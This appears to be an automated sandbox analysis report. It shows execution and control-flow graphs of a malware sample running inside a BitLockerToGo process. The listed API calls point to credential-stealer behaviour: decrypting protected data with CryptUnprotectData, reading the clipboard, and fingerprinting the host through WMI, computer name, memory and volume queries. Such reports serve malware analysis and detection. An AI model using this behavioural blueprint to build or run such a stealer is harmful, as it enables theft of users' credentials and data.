                                                                                                                                                                                                            execution_graph 13911 408640 13913 40864f 13911->13913 13912 4088e6 ExitProcess 13913->13912 13914 408664 GetCurrentProcessId GetCurrentThreadId 13913->13914 13923 4088ca 13913->13923 13915 408690 SHGetSpecialFolderPathW 13914->13915 13916 40868c 13914->13916 13917 408770 13915->13917 13916->13915 13917->13917 13924 43bc90 13917->13924 13919 408797 GetForegroundWindow 13921 408811 13919->13921 13921->13923 13927 40c660 CoInitializeEx 13921->13927 13923->13912 13928 43f000 13924->13928 13926 43bc9a RtlAllocateHeap 13926->13919 13929 43f010 13928->13929 13929->13926 13929->13929 13930 42b842 13931 42b84e 13930->13931 13932 42b90b GetComputerNameExA 13931->13932 13933 42b946 13932->13933 13933->13933 13934 42c282 13935 42c28c 13934->13935 13936 42c34d GetPhysicallyInstalledSystemMemory 13935->13936 13937 42c390 13936->13937 13937->13937 13938 40dc41 13939 40dc51 13938->13939 13968 4237d0 13939->13968 13941 40dc77 13981 423a60 13941->13981 13943 40dc97 13994 425850 13943->13994 13949 40dcc9 14029 427cb0 13949->14029 13951 40dcf2 14041 432d70 OpenClipboard 13951->14041 13953 40dd1b 13954 4237d0 5 API calls 13953->13954 13955 40dd56 13954->13955 13956 423a60 4 API calls 13955->13956 13957 40dd76 13956->13957 13958 425850 3 API calls 13957->13958 13959 40dd96 13958->13959 13960 426000 3 API calls 13959->13960 13961 40dd9f 13960->13961 13962 426340 3 API calls 13961->13962 13963 40dda8 13962->13963 13964 427cb0 3 API calls 13963->13964 13965 40ddd1 13964->13965 13966 432d70 6 API calls 13965->13966 13967 40ddfa 13966->13967 13969 423860 13968->13969 13969->13969 13970 423876 RtlExpandEnvironmentStrings 13969->13970 13973 4238c0 13970->13973 13971 42395e 14051 41ef80 13971->14051 13972 423a3b 13972->13941 13973->13971 13973->13972 13975 423bf1 13973->13975 13977 423939 RtlExpandEnvironmentStrings 13973->13977 14055 43fe20 13973->14055 14065 43fb80 13975->14065 13977->13971 13977->13972 13977->13973 13977->13975 13979 423c2a 13979->13972 14075 43fa50 13979->14075 13982 423a6e 13981->13982 13983 43fa50 LdrInitializeThunk 13982->13983 13986 423922 13983->13986 13984 42395e 13989 41ef80 3 API calls 13984->13989 13985 43fe20 3 API calls 13985->13986 13986->13984 13986->13985 13987 423bf1 13986->13987 13990 423939 RtlExpandEnvironmentStrings 13986->13990 13993 423a3b 13986->13993 13988 43fb80 3 API calls 13987->13988 13991 423c2a 13988->13991 13989->13993 13990->13984 13990->13986 13990->13987 13990->13993 13992 43fa50 LdrInitializeThunk 13991->13992 13991->13993 13992->13991 13993->13943 13995 425ad0 13994->13995 13999 425876 13994->13999 14001 425b04 13994->14001 14003 40dcb7 13994->14003 14121 43d880 13995->14121 13996 43fe20 3 API calls 13996->13999 13998 43fa50 LdrInitializeThunk 13998->14001 13999->13995 13999->13996 14000 43fa50 LdrInitializeThunk 13999->14000 13999->14001 13999->14003 14000->13999 14001->13998 14002 43fb80 3 API calls 14001->14002 14001->14003 14005 43d910 LdrInitializeThunk 14001->14005 14111 440480 14001->14111 14002->14001 14006 426000 14003->14006 14005->14001 14007 426020 14006->14007 14008 42606e 14007->14008 14129 43d910 LdrInitializeThunk 14007->14129 14010 43bc90 RtlAllocateHeap 14008->14010 14013 40dcc0 14008->14013 14011 4260e1 14010->14011 14015 42614e 14011->14015 14130 43d910 LdrInitializeThunk 14011->14130 14012 43bcb0 RtlFreeHeap 14012->14013 14016 426340 14013->14016 14015->14012 14131 426360 14016->14131 14018 426354 14018->13949 14019 426349 14019->14018 14151 4398a0 14019->14151 14021 426c18 14022 4409e0 LdrInitializeThunk 14021->14022 14025 426f6f 14021->14025 14027 426c42 14021->14027 14028 426d75 14021->14028 14022->14028 14168 43d910 LdrInitializeThunk 14025->14168 14027->13949 14028->14025 14028->14027 14028->14028 14158 440e50 14028->14158 14164 440d70 14028->14164 14030 427d60 14029->14030 14030->14030 14031 427d86 RtlExpandEnvironmentStrings 14030->14031 14032 427de0 14031->14032 14033 427e5b 14032->14033 14034 427e38 RtlExpandEnvironmentStrings 14032->14034 14035 427e75 14032->14035 14037 428120 14032->14037 14033->13951 14034->14033 14034->14035 14034->14037 14035->14033 14036 440d70 LdrInitializeThunk 14035->14036 14035->14037 14040 428258 14035->14040 14036->14035 14037->14037 14038 4409e0 LdrInitializeThunk 14037->14038 14038->14040 14039 4409e0 LdrInitializeThunk 14039->14040 14040->14039 14040->14040 14042 432d95 14041->14042 14043 432d9a GetClipboardData 14041->14043 14042->13953 14044 432db7 GlobalLock 14043->14044 14045 432fc8 CloseClipboard 14043->14045 14046 432dd1 14044->14046 14048 432dd6 14044->14048 14045->14042 14046->14045 14047 432fb8 GlobalUnlock 14047->14046 14048->14047 14049 432e0e GetWindowLongW 14048->14049 14050 432e78 14049->14050 14050->14047 14052 41efb0 14051->14052 14052->14052 14079 421060 14052->14079 14056 43fe40 14055->14056 14057 43feae 14056->14057 14106 43d910 LdrInitializeThunk 14056->14106 14058 440118 14057->14058 14059 43bc90 RtlAllocateHeap 14057->14059 14058->13973 14062 43ff1a 14059->14062 14061 43bcb0 RtlFreeHeap 14061->14058 14064 43ffae 14062->14064 14107 43d910 LdrInitializeThunk 14062->14107 14064->14061 14064->14064 14066 43fba0 14065->14066 14067 43fc0e 14066->14067 14108 43d910 LdrInitializeThunk 14066->14108 14068 43fe08 14067->14068 14070 43bc90 RtlAllocateHeap 14067->14070 14068->13979 14071 43fc7a 14070->14071 14073 43fd0e 14071->14073 14109 43d910 LdrInitializeThunk 14071->14109 14072 43bcb0 RtlFreeHeap 14072->14068 14073->14072 14077 43fa70 14075->14077 14076 43fb4f 14076->13979 14077->14076 14110 43d910 LdrInitializeThunk 14077->14110 14094 4409e0 14079->14094 14081 4210a3 14082 43bc90 RtlAllocateHeap 14081->14082 14089 41efd9 14081->14089 14083 4210e1 14082->14083 14093 421199 14083->14093 14098 43d910 LdrInitializeThunk 14083->14098 14085 43bcb0 RtlFreeHeap 14087 42179b 14085->14087 14086 43bc90 RtlAllocateHeap 14086->14093 14087->14089 14104 43d910 LdrInitializeThunk 14087->14104 14089->13972 14090 421789 14090->14085 14093->14086 14093->14090 14099 43d910 LdrInitializeThunk 14093->14099 14100 43bcb0 14093->14100 14096 440a00 14094->14096 14095 440b4e 14095->14081 14096->14095 14105 43d910 LdrInitializeThunk 14096->14105 14098->14083 14099->14093 14101 43bcc3 14100->14101 14102 43bcd4 14100->14102 14103 43bcc8 RtlFreeHeap 14101->14103 14102->14093 14103->14102 14104->14087 14105->14095 14106->14057 14107->14064 14108->14067 14109->14073 14110->14076 14112 44048f 14111->14112 14113 4405ef 14112->14113 14127 43d910 LdrInitializeThunk 14112->14127 14115 43bc90 RtlAllocateHeap 14113->14115 14118 44080f 14113->14118 14116 440675 14115->14116 14116->14116 14119 44074e 14116->14119 14128 43d910 LdrInitializeThunk 14116->14128 14117 43bcb0 RtlFreeHeap 14117->14118 14118->14001 14119->14117 14122 43d8e5 14121->14122 14123 43d899 14121->14123 14124 43bc90 RtlAllocateHeap 14122->14124 14125 43bcb0 RtlFreeHeap 14123->14125 14126 43d8a7 14123->14126 14124->14126 14125->14126 14126->14001 14127->14113 14128->14119 14129->14008 14130->14015 14132 4263a0 14131->14132 14132->14132 14169 43bce0 14132->14169 14139 4267cc 14139->14019 14140 4264fc 14140->14139 14141 426425 14140->14141 14143 426a1b 14140->14143 14191 43c440 14140->14191 14195 43c100 14141->14195 14143->14019 14144 4409e0 LdrInitializeThunk 14143->14144 14148 426d75 14144->14148 14145 440d70 LdrInitializeThunk 14145->14148 14146 440e50 LdrInitializeThunk 14146->14148 14147 426f6f 14199 43d910 LdrInitializeThunk 14147->14199 14148->14145 14148->14146 14148->14147 14150 426f09 14148->14150 14150->14019 14154 4398d0 14151->14154 14152 43fa50 LdrInitializeThunk 14152->14154 14153 43fe20 3 API calls 14153->14154 14154->14152 14154->14153 14155 439a1c 14154->14155 14156 440480 3 API calls 14154->14156 14207 43d910 LdrInitializeThunk 14154->14207 14155->14021 14156->14154 14159 440e70 14158->14159 14162 440ede 14159->14162 14208 43d910 LdrInitializeThunk 14159->14208 14160 440f9e 14160->14028 14162->14160 14209 43d910 LdrInitializeThunk 14162->14209 14166 440d90 14164->14166 14165 440dfe 14165->14028 14166->14165 14210 43d910 LdrInitializeThunk 14166->14210 14168->14027 14170 43bd00 14169->14170 14172 43bd5e 14170->14172 14200 43d910 LdrInitializeThunk 14170->14200 14171 42640d 14179 43bf90 14171->14179 14172->14171 14173 43bc90 RtlAllocateHeap 14172->14173 14176 43be0f 14173->14176 14175 43bcb0 RtlFreeHeap 14175->14171 14178 43be8f 14176->14178 14201 43d910 LdrInitializeThunk 14176->14201 14178->14175 14180 426419 14179->14180 14181 43bfa2 14179->14181 14180->14140 14180->14141 14183 43c510 14180->14183 14181->14180 14202 43d910 LdrInitializeThunk 14181->14202 14185 43c560 14183->14185 14184 43cd0e 14184->14140 14190 43c5be 14185->14190 14203 43d910 LdrInitializeThunk 14185->14203 14187 43cca2 14187->14184 14204 43d910 LdrInitializeThunk 14187->14204 14189 43d910 LdrInitializeThunk 14189->14190 14190->14184 14190->14187 14190->14189 14193 43c460 14191->14193 14192 43c4ce 14192->14140 14193->14192 14205 43d910 LdrInitializeThunk 14193->14205 14196 43c10a 14195->14196 14197 43c17e 14195->14197 14196->14197 14206 43d910 LdrInitializeThunk 14196->14206 14197->14143 14199->14139 14200->14172 14201->14178 14202->14180 14203->14190 14204->14184 14205->14192 14206->14197 14207->14154 14208->14162 14209->14160 14210->14165 14211 43db42 14212 43db70 14211->14212 14213 43dbce 14212->14213 14218 43d910 LdrInitializeThunk 14212->14218 14217 43d910 LdrInitializeThunk 14213->14217 14216 43dcd1 14217->14216 14218->14213 14219 4209c0 14220 420a20 14219->14220 14221 4209ce 14219->14221 14223 420ae0 14221->14223 14224 420af0 14223->14224 14224->14224 14227 440ba0 14224->14227 14226 420bbf 14228 440bc0 14227->14228 14229 440d1e 14228->14229 14231 43d910 LdrInitializeThunk 14228->14231 14229->14226 14231->14229 14232 436805 14233 43681d 14232->14233 14234 436831 GetUserDefaultUILanguage 14233->14234 14235 436858 14234->14235 14236 42de0c 14239 414110 14236->14239 14238 42de11 CoSetProxyBlanket 14239->14238 14240 42b94d 14241 42b959 GetComputerNameExA 14240->14241 14243 4229cd 14244 422aa0 14243->14244 14245 4229e0 14243->14245 14245->14244 14251 422fcf 14245->14251 14253 422b58 14245->14253 14246 422d9c 14247 422def 14246->14247 14248 4231c0 RtlExpandEnvironmentStrings 14246->14248 14252 423210 14248->14252 14249 4235e1 14256 421060 3 API calls 14249->14256 14250 423420 14250->14249 14257 4232b4 14250->14257 14262 423448 14250->14262 14265 43d910 LdrInitializeThunk 14251->14265 14252->14249 14252->14250 14252->14257 14258 42328c RtlExpandEnvironmentStrings 14252->14258 14260 4232dc 14252->14260 14252->14262 14253->14246 14253->14247 14264 43d910 LdrInitializeThunk 14253->14264 14256->14257 14258->14249 14258->14250 14258->14257 14258->14260 14258->14262 14259 423591 GetLogicalDrives 14263 440ba0 LdrInitializeThunk 14259->14263 14260->14260 14261 440ba0 LdrInitializeThunk 14260->14261 14261->14250 14262->14259 14262->14262 14263->14257 14264->14253 14265->14247 14266 43e19a 14268 43e1a2 14266->14268 14267 43e21e 14268->14267 14270 43d910 LdrInitializeThunk 14268->14270 14270->14267 14271 40a11b 14272 40a200 14271->14272 14272->14272 14275 40ad90 14272->14275 14274 40a243 14276 40ae20 14275->14276 14276->14276 14277 40ae45 14276->14277 14278 43d880 2 API calls 14276->14278 14277->14274 14278->14277 14279 409d5e 14280 409d80 14279->14280 14280->14280 14281 409e16 LoadLibraryExW 14280->14281 14282 409e27 14281->14282 14283 40c69e CoInitializeSecurity 14289 419362 14290 419380 14289->14290 14294 4193ee 14290->14294 14295 43d910 LdrInitializeThunk 14290->14295 14292 41933a 14293 4197d1 CryptUnprotectData 14293->14294 14294->14292 14294->14293 14295->14294 14296 43bce0 14297 43bd00 14296->14297 14299 43bd5e 14297->14299 14306 43d910 LdrInitializeThunk 14297->14306 14298 43bf5e 14299->14298 14300 43bc90 RtlAllocateHeap 14299->14300 14303 43be0f 14300->14303 14302 43bcb0 RtlFreeHeap 14302->14298 14305 43be8f 14303->14305 14307 43d910 LdrInitializeThunk 14303->14307 14305->14302 14306->14299 14307->14305 14308 43e6a5 GetForegroundWindow 14309 43e6b3 14308->14309 14310 43dce9 14311 43dd10 14310->14311 14313 43dd6e 14311->14313 14316 43d910 LdrInitializeThunk 14311->14316 14314 43e21e 14313->14314 14317 43d910 LdrInitializeThunk 14313->14317 14314->14314 14316->14313 14317->14314 14318 418df1 14319 418fbd 14318->14319 14320 418dfd 14318->14320 14321 440ba0 LdrInitializeThunk 14320->14321 14321->14319 14322 4316b2 CoSetProxyBlanket 14323 43e471 14324 43e4a0 14323->14324 14324->14324 14325 43e4fe 14324->14325 14327 43d910 LdrInitializeThunk 14324->14327 14327->14325 14328 4384f0 14329 438515 14328->14329 14332 4385f2 14329->14332 14337 43d910 LdrInitializeThunk 14329->14337 14331 4387f0 14332->14331 14334 4386e7 14332->14334 14336 43d910 LdrInitializeThunk 14332->14336 14334->14331 14338 43d910 LdrInitializeThunk 14334->14338 14336->14332 14337->14329 14338->14334 14339 42c736 14341 42c770 14339->14341 14340 42c89e 14341->14340 14343 43d910 LdrInitializeThunk 14341->14343 14343->14340 14344 40d6f8 14345 40d720 14344->14345 14348 438860 14345->14348 14347 40d88d 14350 438890 CoCreateInstance 14348->14350 14351 438ed5 14350->14351 14352 438af5 SysAllocString 14350->14352 14354 438ee5 GetVolumeInformationW 14351->14354 14355 438b83 14352->14355 14363 438f03 14354->14363 14356 438ec5 SysFreeString 14355->14356 14357 438b8b CoSetProxyBlanket 14355->14357 14356->14351 14358 438ebb 14357->14358 14359 438bab SysAllocString 14357->14359 14358->14356 14361 438c70 14359->14361 14361->14361 14362 438ca8 SysAllocString 14361->14362 14365 438ccf 14362->14365 14363->14347 14364 438ea9 SysFreeString SysFreeString 14364->14358 14365->14364 14366 438e9f 14365->14366 14367 438d17 VariantInit 14365->14367 14366->14364 14368 438d70 14367->14368 14368->14368 14369 438e8e VariantClear 14368->14369 14369->14366

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00438860 Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 666memorycomCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 0 438860-438889 1 438890-4388c2 0->1 1->1 2 4388c4-4388d9 1->2 3 4388e0-438912 2->3 3->3 4 438914-438954 3->4 5 438960-438988 4->5 5->5 6 43898a-4389a3 5->6 8 4389a5-4389af 6->8 9 438a1a-438a23 6->9 11 4389b0-4389c9 8->11 10 438a30-438a96 9->10 10->10 12 438a98-438aef CoCreateInstance 10->12 11->11 13 4389cb-4389de 11->13 14 438ed5-438f01 call 43f450 GetVolumeInformationW 12->14 15 438af5-438b29 12->15 16 4389e0-438a0e 13->16 22 438f03-438f07 14->22 23 438f0b-438f0d 14->23 17 438b30-438b59 15->17 16->16 19 438a10-438a15 16->19 17->17 20 438b5b-438b85 SysAllocString 17->20 19->9 28 438ec5-438ed1 SysFreeString 20->28 29 438b8b-438ba5 CoSetProxyBlanket 20->29 22->23 25 438f1d-438f28 23->25 26 438f34-438f46 25->26 27 438f2a-438f31 25->27 30 438f50-438fb0 26->30 27->26 28->14 31 438ebb-438ec1 29->31 32 438bab-438bbb 29->32 30->30 33 438fb2-438fe7 30->33 31->28 34 438bc0-438be3 32->34 35 438ff0-43903a 33->35 34->34 36 438be5-438c65 SysAllocString 34->36 35->35 37 43903c-43906d call 41dc90 35->37 38 438c70-438ca6 36->38 42 439070-439078 37->42 38->38 40 438ca8-438cd5 SysAllocString 38->40 44 438cdb-438cfd 40->44 45 438ea9-438eb9 SysFreeString * 2 40->45 42->42 46 43907a-43907c 42->46 52 438d03-438d06 44->52 53 438e9f-438ea5 44->53 45->31 47 439082-439092 call 408060 46->47 48 438f10-438f17 46->48 47->48 48->25 51 439097-43909e 48->51 52->53 55 438d0c-438d11 52->55 53->45 55->53 56 438d17-438d62 VariantInit 55->56 57 438d70-438d99 56->57 57->57 58 438d9b-438dad 57->58 59 438db1-438db3 58->59 60 438db9-438dbf 59->60 61 438e8e-438e9b VariantClear 59->61 60->61 62 438dc5-438dd3 60->62 61->53 63 438dd5-438dda 62->63 64 438e0d 62->64 66 438dec-438df0 63->66 65 438e0f-438e4d call 407ed0 call 408d20 64->65 77 438e4f-438e65 65->77 78 438e7d-438e8a call 407ee0 65->78 67 438df2-438dfb 66->67 68 438de0 66->68 70 438e02-438e06 67->70 71 438dfd-438e00 67->71 73 438de1-438dea 68->73 70->73 74 438e08-438e0b 70->74 71->73 73->65 73->66 74->73 77->78 79 438e67-438e74 77->79 78->61 79->78 81 438e76-438e79 79->81 81->78
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(k2`0), ref: 00438B60
                                                                                                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
                                                                                                                                                                                                            • VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00438E8F
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00438EB3
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00438EB9
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00438EC6
                                                                                                                                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                            • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                                                                                                                                            • API String ID: 2573436264-4038474941
                                                                                                                                                                                                            • Opcode ID: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                                                                                                                                            • Instruction ID: 6e5b62aa8b1ec0da306810ad309870e49cdd1aa0d64757ab7dc6e3fbd6c770b3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3122EFB66083419BD310CF28C885B6BBBE5EFC9314F14892DF595DB2A0DB79D805CB86
                                                                                                                                                                                                            Function 00419362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390encryptionCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 83 419362-419374 84 419380-4193bb 83->84 84->84 85 4193bd-4193c5 84->85 86 4193c7-4193d6 85->86 87 41940a-419465 call 401a50 85->87 89 4193e0-4193e7 86->89 93 419470-4194d2 87->93 91 4193f0-4193f6 89->91 92 4193e9-4193ec 89->92 91->87 95 4193f8-419407 call 43d910 91->95 92->89 94 4193ee 92->94 93->93 96 4194d4-4194fb call 401d90 93->96 94->87 95->87 101 419502-41956f 96->101 102 4195f2-4195f4 96->102 103 41933a 96->103 104 419570-4195c7 101->104 105 419600-419606 102->105 106 419340-419349 call 407ee0 103->106 104->104 107 4195c9-4195eb call 401d90 104->107 105->105 108 419608-41963e 105->108 121 41934c-419351 106->121 107->101 107->102 107->106 120 419360 107->120 107->121 111 419640-419643 108->111 112 419645-419648 108->112 111->112 113 41964a 111->113 114 41964c-419658 112->114 113->114 117 41965a-41965d 114->117 118 41965f 114->118 117->118 122 419660-41967e call 407ed0 117->122 118->122 120->120 121->120 125 419795-4197f4 call 43f450 CryptUnprotectData 122->125 126 419684-41968b 122->126 125->101 125->102 127 4196b2-4196fc call 41d140 * 2 126->127 134 4196a0-4196ac 127->134 135 4196fe-419719 call 41d140 127->135 134->125 134->127 135->134 138 41971b-419743 135->138 139 419691-419695 138->139 140 419749-41975f call 41d140 138->140 139->134 143 419765-419790 140->143 144 41968d 140->144 143->134 144->139
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CryptDataInitializeThunkUnprotect
                                                                                                                                                                                                            • String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
                                                                                                                                                                                                            • API String ID: 279577407-4262920783
                                                                                                                                                                                                            • Opcode ID: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                                                                                                                                            • Instruction ID: e77fc135ad70ed6736d1295220b367ee2e65166797322382e6457787232dfc05
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3C109B2A083418BD728CF28C8A17AFB7E2AFD5304F19893DD49987351DB389C45CB46
                                                                                                                                                                                                            Function 00421060 Relevance: 14.3, Strings: 11, Instructions: 575COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 145 421060-4210a8 call 4409e0 148 4218a3-4218b3 145->148 149 4210ae-42110e call 4140f0 call 43bc90 145->149 154 421110-421113 149->154 155 421115-421189 154->155 156 42118b-42118f 154->156 155->154 157 421191-421197 156->157 158 4211a3-4211bc 157->158 159 421199-42119e 157->159 161 4211c3-4211ce 158->161 162 4211be 158->162 160 42125b-42125e 159->160 165 421262-421267 160->165 166 421260 160->166 163 42124a-42124f 161->163 164 4211d0-421240 call 43d910 161->164 162->163 168 421251-421254 163->168 169 421259 163->169 173 421245 164->173 170 42178d-4217c4 call 43bcb0 165->170 171 42126d-42127d 165->171 166->165 168->157 169->160 179 4217c6-4217c9 170->179 174 42127f-4212a1 171->174 173->163 176 4212a3 174->176 177 4212a8-4212c7 174->177 180 421467 176->180 178 4212c9-4212cc 177->178 181 4212f8-421316 call 4218c0 178->181 182 4212ce-4212f6 178->182 183 421841-421845 179->183 184 4217cb-42183f 179->184 185 42146b-42146e 180->185 181->180 197 42131c-421349 181->197 182->178 187 421847-42184d 183->187 184->179 188 421470-421474 185->188 189 421476-42148c call 43bc90 185->189 191 421851-421863 187->191 192 42184f 187->192 193 4214a4-4214a6 188->193 207 421490-42149b 189->207 208 42148e-4214a2 189->208 199 421867-42186d 191->199 200 421865 191->200 198 4218a1 192->198 195 421764-42176b 193->195 196 4214ac-4214cb 193->196 213 421777-42177b 195->213 214 42176d-421775 195->214 202 4214cd-4214d0 196->202 203 42134b-42134e 197->203 198->148 205 421895-421898 199->205 206 42186f-421891 call 43d910 199->206 200->205 209 4214d2-4214f8 202->209 210 4214fa-42153d 202->210 211 421393-4213ae call 4218c0 203->211 212 421350-421391 203->212 216 42189a-42189d 205->216 217 42189f 205->217 206->205 219 42177f-421783 207->219 208->193 209->202 220 42153f-421542 210->220 230 4213b0-4213b4 211->230 231 4213b9-4213d0 211->231 212->203 222 42177d 213->222 214->222 216->187 217->198 219->174 224 421789-42178b 219->224 225 421544-4215b8 220->225 226 4215ba-4215c0 220->226 222->219 224->170 225->220 229 4215c4-4215ca 226->229 232 4215d6-4215f8 229->232 233 4215cc-4215d1 229->233 230->185 234 4213d2 231->234 235 4213d4-421465 call 407ed0 call 413d60 call 407ee0 231->235 237 421601-421613 232->237 238 4215fa-4215fc 232->238 236 4216b5-4216b8 233->236 234->235 235->185 241 4216ba 236->241 242 4216bc-4216db 236->242 243 42169d-4216a9 237->243 244 421619-421693 call 43d910 237->244 238->243 241->242 248 4216dd-4216e0 242->248 246 4216b3 243->246 247 4216ab-4216ae 243->247 253 421698 244->253 246->236 247->229 251 4216e2-4216f7 248->251 252 4216f9-4216ff 248->252 251->248 254 421701-421705 252->254 255 421735-421738 252->255 253->243 259 421707-42170e 254->259 256 42173a-42174b call 43bcb0 255->256 257 42174d-421753 255->257 261 421755-421758 256->261 257->261 263 421710-42171c 259->263 264 42171e-421727 259->264 261->195 266 42175a-421762 261->266 263->259 268 42172b 264->268 269 421729 264->269 266->219 270 421731-421733 268->270 269->270 270->255
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeapInitializeThunk
                                                                                                                                                                                                            • String ID: !@$,$0$1$=$?$@$B$T$V$W
                                                                                                                                                                                                            • API String ID: 383220839-2565976686
                                                                                                                                                                                                            • Opcode ID: 694c3fec6f08d54430612453bc0ba53508c55e5cebad724f7ac0ec954b199606
                                                                                                                                                                                                            • Instruction ID: bd3356e8815184d6709652c26fefee66f72d067b08eb61c2d628a82e36adc5dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 694c3fec6f08d54430612453bc0ba53508c55e5cebad724f7ac0ec954b199606
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D32E27160C7908FD324CB28D4803AFBBE2ABE5314F58896EE5D5873A1D6B98845CB47
                                                                                                                                                                                                            Function 0040AD90 Relevance: 14.2, Strings: 11, Instructions: 485COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 271 40ad90-40ae18 272 40ae20-40ae29 271->272 272->272 273 40ae2b-40ae3e 272->273 275 40b0c0-40b0c4 273->275 276 40b1a1-40b1aa 273->276 277 40b1b1-40b1b8 273->277 278 40ae45-40ae47 273->278 279 40b0c9-40b167 call 407db0 273->279 280 40ae4c-40b073 273->280 281 40b1bd-40b1cb 273->281 282 40b16e-40b175 273->282 284 40b49e-40b4aa 275->284 276->277 276->281 290 40b3c0-40b3d4 276->290 291 40b481 276->291 292 40b349-40b350 276->292 293 40b30c 276->293 294 40b38d-40b394 276->294 295 40b2d0 276->295 296 40b330-40b33c 276->296 297 40b370-40b379 276->297 298 40b450 276->298 299 40b470 276->299 300 40b472-40b475 276->300 301 40b3f4-40b417 call 43d880 276->301 302 40b315-40b328 276->302 303 40b456 276->303 304 40b357 276->304 305 40b47c 276->305 306 40b35d-40b366 276->306 307 40b41e-40b446 276->307 308 40b37f-40b386 276->308 309 40b25f-40b27b 277->309 288 40b4ad-40b4b4 278->288 279->276 279->277 279->281 279->282 279->290 279->291 279->292 279->293 279->294 279->295 279->296 279->297 279->298 279->299 279->300 279->301 279->302 279->303 279->304 279->305 279->306 279->307 279->308 289 40b080-40b0a2 280->289 283 40b1d0-40b253 281->283 286 40b193-40b19c 282->286 287 40b17c-40b191 call 43f450 282->287 283->283 310 40b259-40b25c 283->310 284->288 322 40b494-40b49b 286->322 287->286 289->289 317 40b0a4-40b0af 289->317 326 40b3db-40b3ed 290->326 328 40b488-40b48b 291->328 292->290 292->291 292->294 292->297 292->298 292->299 292->300 292->301 292->303 292->304 292->305 292->306 292->307 292->308 293->302 294->286 294->287 294->295 312 40b3b2-40b3bb 294->312 313 40b2d6-40b2e0 294->313 314 40b2e7-40b2fc call 43f450 294->314 315 40b39b-40b3b0 call 43f450 294->315 316 40b2fe-40b307 294->316 331 40b343 296->331 297->308 300->291 300->305 301->291 301->298 301->299 301->300 301->303 301->305 301->307 302->296 320 40b45b-40b461 303->320 305->291 306->297 307->320 308->290 308->291 308->294 308->298 308->299 308->300 308->301 308->303 308->305 308->307 311 40b280-40b2a6 309->311 310->309 311->311 323 40b2a8-40b2c4 311->323 312->291 313->286 313->287 313->314 313->316 314->316 315->312 316->328 337 40b0b2-40b0b9 317->337 320->299 322->284 323->290 323->291 323->292 323->293 323->294 